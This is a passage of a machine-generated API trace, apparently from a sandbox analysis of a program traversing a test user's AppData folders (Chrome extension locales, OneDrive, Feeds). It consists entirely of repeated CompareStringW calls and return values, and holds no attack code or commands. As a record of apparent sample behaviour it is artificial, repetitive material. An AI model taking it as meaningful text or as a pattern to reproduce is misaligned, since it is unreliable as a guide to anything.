lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount2=92) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 2 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\", cchCount2=130) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_US\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\", cchCount2=130) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\gl\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\", cchCount2=130) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\", cchCount2=130) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount2=130) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount2=130) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount2=130) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount2=72) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 2 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount2=89) returned 2 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount2=73) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount2=73) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount2=73) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount2=73) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount2=73) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount2=73) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\", cchCount1=78, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount2=73) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount2=73) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount2=127) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount2=139) returned 1 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount2=139) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount2=139) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount2=139) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount2=130) returned 3 [0296.919] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount2=130) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount2=130) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\pt_PT\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount2=130) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\uk\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\te\\", cchCount2=130) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount2=55) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount2=55) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount2=55) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount2=55) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\", cchCount2=55) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\", cchCount1=127, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount2=74) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount2=74) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ka\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount2=74) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount2=74) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fr\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\adm\\", cchCount2=74) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\el\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount2=139) returned 1 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount2=139) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\", cchCount2=139) returned 3 [0296.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 